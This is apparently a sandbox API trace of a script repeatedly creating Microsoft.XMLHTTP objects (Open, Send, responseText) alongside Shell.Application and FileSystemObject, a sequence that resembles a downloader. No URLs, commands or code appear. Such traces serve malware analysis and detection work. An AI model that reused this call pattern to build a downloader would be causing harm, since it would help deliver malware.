	[0456.524] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0456.524] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0456.524] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0456.524] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0456.524] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0456.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0456.778] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0456.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0456.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0456.778] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0456.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0456.779] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0456.779] SysStringLen (param_1=0x0) returned 0x0
	[0456.779] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0456.779] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0456.779] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0456.779] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0456.779] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0456.779] ??2@YAPEAX_K@Z () returned 0x62f350
	[0456.779] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0456.779] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0456.779] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0456.779] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0456.779] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0456.779] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0456.779] SysStringLen (param_1=0x0) returned 0x0
	[0456.779] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0456.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0456.782] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0456.782] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0456.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0456.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0456.782] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0458.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0458.144] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0458.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0458.145] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0458.145] SysStringLen (param_1=0x0) returned 0x0
	[0458.145] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0458.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0458.146] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0458.146] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0458.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7258) returned 0x0
	[0458.146] ??2@YAPEAX_K@Z () returned 0x62f310
	[0458.146] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7258, pUnkSite=0x62f310) 
	[0458.146] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0458.146] XMLHTTPRequest:IUnknown:Release (This=0x49c7258) returned 0x0
	[0458.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0458.146] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0458.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0458.146] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0458.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0458.149] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0458.149] SysStringLen (param_1=0x0) returned 0x0
	[0458.149] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0458.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0458.149] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0458.149] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0458.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72a8) returned 0x0
	[0458.149] ??2@YAPEAX_K@Z () returned 0x62f330
	[0458.149] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72a8, pUnkSite=0x62f330) 
	[0458.149] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0458.149] XMLHTTPRequest:IUnknown:Release (This=0x49c72a8) returned 0x0
	[0458.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0458.149] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0458.149] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0458.150] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0458.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0458.150] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0458.150] SysStringLen (param_1=0x0) returned 0x0
	[0458.150] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0458.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0458.150] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7230) returned 0x0
	[0458.150] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0458.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74d8) returned 0x0
	[0458.150] ??2@YAPEAX_K@Z () returned 0x62f310
	[0458.150] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74d8, pUnkSite=0x62f310) 
	[0458.150] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0458.150] XMLHTTPRequest:IUnknown:Release (This=0x49c74d8) returned 0x0
	[0458.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7230) returned 0x0
	[0458.150] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7230) returned 0x3
	[0458.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0458.150] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7230, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0458.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0458.151] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0458.151] SysStringLen (param_1=0x0) returned 0x0
	[0458.151] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0458.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0458.151] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0458.151] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0458.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0458.151] ??2@YAPEAX_K@Z () returned 0x62f330
	[0458.151] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f330) 
	[0458.151] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0458.151] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0458.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0458.151] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0458.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
